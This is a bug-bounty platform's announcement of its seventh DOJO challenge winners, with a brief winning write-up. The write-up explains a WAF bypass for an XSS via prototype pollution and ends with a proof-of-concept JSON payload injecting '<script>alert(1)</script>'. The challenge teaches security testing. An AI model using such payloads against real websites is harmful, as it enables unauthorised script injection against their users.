The #7th DOJO CHALLENGE was on finding a valid WAF bypass to exploit an XSS on prototype pollution vulnerability.
WINNERS!
We are glad to announce the #7 DOJO Challenge winners list.
dojo
March 12, 2021
The #7th DOJO CHALLENGE was on finding a valid WAF bypass to exploit an XSS on prototype pollution vulnerability.
We are glad to announce the #7 DOJO Challenge winners list.
Subscribe to our Twitter or Linkedin feeds to be notified of the upcoming challenges.
Read on to find the best write-up as well as the challenge author’s recommendations.
You had an input field that you could inject, but many characters were sanitized and the WAF could detect them. The goal was to get around that WAF and find a way to exploit an XSS.
We asked you to produce a qualified write-up report explaining the logic allowing such exploitation. This write-up serves two purposes:
Zomsop82‘sreport was detailed, informative, and good at explaining the WAF exploitation logic.
The others reports, notably Marcosen‘s and ivarsvids‘s were also very nice, we’re sorry can’t publish them all because that’s where you clearly witness the outstanding creativity of our community.
Thank you all for playing with us!
————– START OF Zomsop82 REPORT ——————
Website allow user to control a JavaScript variable named “config” which can be used to perform reflected XSS.
It is noted that a “WAF” is in place to avoid XSS but can be bypassed.
Final payload is:
{"__proto__":[], "name": "<script>alert(1)</script>"}
Payload
{"__proto__":[], "name": "<script>alert(1)</script>"}
————– END OF Zomsop82 REPORT ——————